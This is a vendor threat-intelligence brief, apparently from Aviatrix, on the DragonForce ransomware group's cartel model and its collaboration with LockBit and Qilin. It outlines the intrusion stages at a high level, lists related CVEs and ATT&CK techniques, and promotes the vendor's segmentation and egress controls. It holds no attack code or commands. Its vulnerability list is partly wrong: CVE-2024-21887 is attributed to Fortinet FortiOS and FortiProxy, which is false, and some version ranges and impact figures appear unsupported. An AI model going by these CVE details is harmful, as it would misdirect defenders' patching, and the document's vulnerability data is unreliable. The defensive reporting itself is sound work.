Executive Summary
In March 2025, the DragonForce ransomware group rebranded itself as a cartel, allowing affiliates to create their own brands while utilizing DragonForce's infrastructure and tools. This strategic shift led to increased collaboration among ransomware groups, notably with LockBit and Qilin, aiming to consolidate power and enhance operational effectiveness. The cartel model facilitated larger, more coordinated ransomware campaigns, employing advanced tactics such as double extortion, exploitation of known vulnerabilities, and the use of sophisticated tools like Cobalt Strike and Mimikatz. This evolution resulted in a significant uptick in ransomware incidents, impacting various sectors globally, including government entities, retail operations, manufacturing companies, and construction firms. The formation of such cartels underscores a concerning trend in the cyber threat landscape, where ransomware groups are increasingly collaborating to amplify their reach and impact. This development necessitates heightened vigilance and adaptive defense strategies from organizations to mitigate the evolving threats posed by these alliances.
Why This Matters Now
The emergence of ransomware cartels like DragonForce's signifies a shift towards more organized and potent cyber threats, demanding immediate attention and enhanced cybersecurity measures from organizations worldwide.
Attack Path Analysis
DragonForce initiated the attack by exploiting unpatched vulnerabilities in internet-facing services to gain initial access. They escalated privileges using tools like Mimikatz to harvest credentials. The attackers moved laterally through the network by abusing RDP and deploying Cobalt Strike. They established command and control channels using SystemBC to maintain persistent access. Sensitive data was exfiltrated using tools like Restic before encrypting systems. Finally, they encrypted critical data and demanded ransom, employing double extortion tactics.
Kill Chain Progression
Initial Compromise
Description
Exploited unpatched vulnerabilities in internet-facing services to gain initial access.
Related CVEs
CVE-2021-44228
CVSS 10Apache Log4j2 Remote Code Execution Vulnerability.
Affected Products:
Apache Log4j2 – 2.0-beta9 to 2.14.1
Exploit Status:
exploited in the wildCVE-2024-21887
CVSS 9.1Arbitrary Command Execution in Fortinet FortiOS and FortiProxy.
Affected Products:
Fortinet FortiOS – 7.0.0 to 7.0.12, 7.2.0 to 7.2.4
Fortinet FortiProxy – 7.0.0 to 7.0.12, 7.2.0 to 7.2.4
Exploit Status:
exploited in the wildCVE-2024-21762
CVSS 9.8Heap-based Buffer Overflow in Fortinet FortiOS and FortiProxy.
Affected Products:
Fortinet FortiOS – 7.0.0 to 7.0.12, 7.2.0 to 7.2.4
Fortinet FortiProxy – 7.0.0 to 7.0.12, 7.2.0 to 7.2.4
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Techniques identified for SEO/filtering; may be expanded with full STIX/TAXII enrichment later.
Phishing
Exploit Public-Facing Application
Valid Accounts
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
Access Token Manipulation
Obfuscated Files or Information
File and Directory Discovery
Remote Services
Data Encrypted for Impact
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA Zero Trust Maturity Model 2.0 – Implement strong authentication mechanisms
Control ID: Identity Pillar
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Health Care / Life Sciences
DragonForce cartel coordination threatens HIPAA-regulated patient data through sophisticated lateral movement, encrypted traffic exfiltration, and organized multi-gang ransomware operations.
Banking/Mortgage
Financial institutions face elevated risk from coordinated ransomware cartels targeting payment systems, with advanced egress filtering and zero trust segmentation critical for protection.
Government Administration
Government agencies vulnerable to organized ransomware cartels leveraging multi-cloud visibility gaps, requiring enhanced threat detection and east-west traffic security controls immediately.
Information Technology/IT
IT sector faces compound risk as both target and enabler, requiring comprehensive Kubernetes security, cloud firewall protection, and inline IPS against coordinated attacks.
Sources
- Ransomware Gang Goes Full 'Godfather' With Cartelhttps://www.darkreading.com/cyber-risk/ransomware-gang-full-godfather-cartelVerified
- DragonForce Ransomware Reporthttps://www.quorumcyber.com/malware-reports/dragonforce-ransomware-report/Verified
- DragonForce Calls for Ransomware Cartel with LockBit and Qilinhttps://www.quorumcyber.com/threat-intelligence/threat-assessment-dragonforce-calls-for-ransomware-cartel-with-lockbit-and-qilin/Verified
- DragonForce Ransomware: Redefining Hybrid Extortion in 2025https://blog.checkpoint.com/security/dragonforce-ransomware-redefining-hybrid-extortion-in-2025/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have significantly limited the attacker's ability to move laterally, escalate privileges, and exfiltrate data by enforcing strict segmentation and identity-aware policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: While Aviatrix CNSF may not prevent initial exploitation, it would likely limit the attacker's ability to exploit further vulnerabilities within the internal network.
Control: Zero Trust Segmentation
Mitigation: Aviatrix Zero Trust Segmentation would likely limit the attacker's ability to access sensitive systems, even with escalated privileges.
Control: East-West Traffic Security
Mitigation: Aviatrix East-West Traffic Security would likely constrain the attacker's ability to move laterally across the network.
Control: Multicloud Visibility & Control
Mitigation: Aviatrix Multicloud Visibility & Control would likely limit the attacker's ability to maintain persistent command and control channels.
Control: Egress Security & Policy Enforcement
Mitigation: Aviatrix Egress Security & Policy Enforcement would likely limit the attacker's ability to exfiltrate sensitive data.
While Aviatrix controls may not prevent data encryption, they would likely limit the attacker's ability to access and encrypt additional systems.
Impact at a Glance
Affected Business Functions
- Retail Operations
- Supply Chain Management
- Customer Service
Estimated downtime: 14 days
Estimated loss: $5,000,000
Customer PII and payment information.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict lateral movement and enforce least privilege access.
- • Deploy East-West Traffic Security controls to monitor and control internal traffic, detecting unauthorized movements.
- • Utilize Egress Security & Policy Enforcement to prevent unauthorized data exfiltration and command and control communications.
- • Enhance Threat Detection & Anomaly Response capabilities to identify and respond to malicious activities promptly.
- • Regularly update and patch internet-facing services to mitigate exploitation of known vulnerabilities.
